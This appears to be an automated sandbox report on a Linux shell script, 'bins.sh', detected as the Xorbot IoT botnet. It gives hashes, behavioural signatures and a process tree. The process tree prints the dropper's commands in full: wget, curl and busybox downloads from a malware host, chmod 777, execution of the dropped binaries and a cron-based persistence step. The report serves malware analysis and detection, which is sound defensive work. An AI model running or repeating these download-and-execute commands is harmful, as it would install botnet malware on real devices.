Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240226-en
  • resource tags

    arch:mipsel image:debian9-mipsel-20240226-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system
  • submitted
    10/12/2024, 12:52

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    76332caef0ad924adea8ad2d888817f1

  • SHA1

    a8474f314af7375aabfa4b9c94d039e27c8a4f87

  • SHA256

    5ba18bcbe3809ddafbbc1b1452b28070c84795f6254dcb2f4774942326290c2b

  • SHA512

    32bc8f9f68837d308bb57cca1de47d44b286fcff7835c439992400e7455f5a79afbb3be407a9166a65bc6a1ae1a654dd6fd59c0b2e68c67ceb2e4710a7742952

  • SSDEEP

    192:Hl4Akbp1TV77YpFUx3MI+4p1977YpFS3MIRfK:Hl4Akbp1TV77YpFUx3MI+4p1977YpFSW

Malware Config

Signatures

  • Detects Xorbot 3 IoCs
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

  • Xorbot family
  • Contacts a large (2001) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 5 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 5 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 16 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 7 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
    PID:709
    • /bin/rm
      /bin/rm bins.sh
      2⤵
      PID:711
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:716
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:736
    • /bin/busybox
      /bin/busybox wget http://conn.masjesu.zip/bins/3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:740
    • /bin/chmod
      chmod 777 3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
      2⤵
      • File and Directory Permissions Modification
      PID:741
    • /tmp/3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
      ./3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
      2⤵
      • Executes dropped EXE
      • Renames itself
      • Reads runtime system information
      PID:742
      • /bin/sh
        sh -c "crontab -l"
        3⤵
        PID:744
        • /usr/bin/crontab
          crontab -l
          4⤵
          PID:745
      • /bin/sh
        sh -c "crontab -"
        3⤵
        PID:746
        • /usr/bin/crontab
          crontab -
          4⤵
          • Creates/modifies Cron job
          PID:747
    • /bin/rm
      rm 3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
      2⤵
      PID:749
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/ueGyRhJ4slW8tDDSMvvYb444hjR5Cs3ghf
      2⤵
      • System Network Configuration Discovery
      PID:752
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/ueGyRhJ4slW8tDDSMvvYb444hjR5Cs3ghf
      2⤵
      • System Network Configuration Discovery
      PID:838
    • /bin/busybox
      /bin/busybox wget http://conn.masjesu.zip/bins/ueGyRhJ4slW8tDDSMvvYb444hjR5Cs3ghf
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:843
    • /bin/chmod
      chmod 777 ueGyRhJ4slW8tDDSMvvYb444hjR5Cs3ghf
      2⤵
      • File and Directory Permissions Modification
      PID:844
    • /tmp/ueGyRhJ4slW8tDDSMvvYb444hjR5Cs3ghf
      ./ueGyRhJ4slW8tDDSMvvYb444hjR5Cs3ghf
      2⤵
      • Executes dropped EXE
      PID:845
    • /bin/rm
      rm ueGyRhJ4slW8tDDSMvvYb444hjR5Cs3ghf
      2⤵
      PID:851
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/lyNaH7vmD6N4e4MiEHpYemu3SMBBUnG4X3
      2⤵
      • System Network Configuration Discovery
      PID:852
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/lyNaH7vmD6N4e4MiEHpYemu3SMBBUnG4X3
      2⤵
      • System Network Configuration Discovery
      PID:853
    • /bin/busybox
      /bin/busybox wget http://conn.masjesu.zip/bins/lyNaH7vmD6N4e4MiEHpYemu3SMBBUnG4X3
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:854
    • /bin/chmod
      chmod 777 lyNaH7vmD6N4e4MiEHpYemu3SMBBUnG4X3
      2⤵
      • File and Directory Permissions Modification
      PID:859
    • /tmp/lyNaH7vmD6N4e4MiEHpYemu3SMBBUnG4X3
      ./lyNaH7vmD6N4e4MiEHpYemu3SMBBUnG4X3
      2⤵
      • Executes dropped EXE
      PID:860
    • /bin/rm
      rm lyNaH7vmD6N4e4MiEHpYemu3SMBBUnG4X3
      2⤵
      PID:862
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/WQt8PGIrrt77f9GaFzfCkaMtwyNEtaN8aV
      2⤵
      • System Network Configuration Discovery
      PID:863
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/WQt8PGIrrt77f9GaFzfCkaMtwyNEtaN8aV
      2⤵
      • System Network Configuration Discovery
      PID:864
    • /bin/busybox
      /bin/busybox wget http://conn.masjesu.zip/bins/WQt8PGIrrt77f9GaFzfCkaMtwyNEtaN8aV
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:867
    • /bin/chmod
      chmod 777 WQt8PGIrrt77f9GaFzfCkaMtwyNEtaN8aV
      2⤵
      • File and Directory Permissions Modification
      PID:870
    • /tmp/WQt8PGIrrt77f9GaFzfCkaMtwyNEtaN8aV
      ./WQt8PGIrrt77f9GaFzfCkaMtwyNEtaN8aV
      2⤵
      • Executes dropped EXE
      PID:871
    • /bin/rm
      rm WQt8PGIrrt77f9GaFzfCkaMtwyNEtaN8aV
      2⤵
      PID:872
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/TcjtbKWTus7clTOgbmCaw7a6BPyBWnYyUu
      2⤵
      • System Network Configuration Discovery
      PID:873
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/TcjtbKWTus7clTOgbmCaw7a6BPyBWnYyUu
      2⤵
      • System Network Configuration Discovery
      PID:879
    • /bin/busybox
      /bin/busybox wget http://conn.masjesu.zip/bins/TcjtbKWTus7clTOgbmCaw7a6BPyBWnYyUu
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:881
    • /bin/chmod
      chmod 777 TcjtbKWTus7clTOgbmCaw7a6BPyBWnYyUu
      2⤵
      • File and Directory Permissions Modification
      PID:888
    • /tmp/TcjtbKWTus7clTOgbmCaw7a6BPyBWnYyUu
      ./TcjtbKWTus7clTOgbmCaw7a6BPyBWnYyUu
      2⤵
      • Executes dropped EXE
      PID:890
    • /bin/rm
      rm TcjtbKWTus7clTOgbmCaw7a6BPyBWnYyUu
      2⤵
      PID:895
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/5dplbCUfIy43JFL8belWdirvGjKEgYaLqU
      2⤵
      • System Network Configuration Discovery
      PID:897

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v

    Filesize

    151KB

    MD5

    6c583043d91c55aa470c08c87058e917

    SHA1

    abf65a5b9bba69980278ad09356e53de8bb89439

    SHA256

    2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948

    SHA512

    82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

  • /tmp/TcjtbKWTus7clTOgbmCaw7a6BPyBWnYyUu

    Filesize

    177KB

    MD5

    786d75a158fe731feca3880f436082c0

    SHA1

    79ea2734e43d00cdeabed5586b2c1994d02aef3e

    SHA256

    5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

    SHA512

    7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

  • /tmp/WQt8PGIrrt77f9GaFzfCkaMtwyNEtaN8aV

    Filesize

    98KB

    MD5

    5141342d0df8699fa32a6b066a0c592e

    SHA1

    8157673225bd5182f16215e2aa823a25ca2d4fbc

    SHA256

    54302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d

    SHA512

    d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801

  • /tmp/lyNaH7vmD6N4e4MiEHpYemu3SMBBUnG4X3

    Filesize

    99KB

    MD5

    9438d9bc392bcf300a5583b6df5bc8f6

    SHA1

    375a6ae34b516f6f3eeea8030c4084f585017efa

    SHA256

    68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

    SHA512

    1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

  • /tmp/ueGyRhJ4slW8tDDSMvvYb444hjR5Cs3ghf

    Filesize

    111KB

    MD5

    ca897a38f23ec23521ce0b1b83f8422d

    SHA1

    b8d2ab335346aba9a72bae0fe3533aca1ab7b66a

    SHA256

    043df61baf17d6a2353b418c5f87eebea4ca1c3fd6b63eaccc34d9bcd0556832

    SHA512

    10d3026b43167121b62786dde231a04e25eb27905989f59a92b5eba92134e30cea554a73e419d3a505e650ee4c474ee407103df335cd84bd8c0f3428ccc16feb

  • /var/spool/cron/crontabs/tmp.zTPbkf

    Filesize

    210B

    MD5

    41df79823063639c62a77b5f7bffad1f

    SHA1

    7275b16056f2b5745230e7aa755371a7dbe84476

    SHA256

    3b5639bacdb4eea57461e32231f337f6be886477a3cdd20e3f417b0d1318042d

    SHA512

    de8000f07b2d86a85b3733de29cfec5192b5756f1f7c3e2f63696b0dc92aa6c4db12217791171124de1b26c9fa89a8aa44299da93911b6352fe7e7f4562c3e69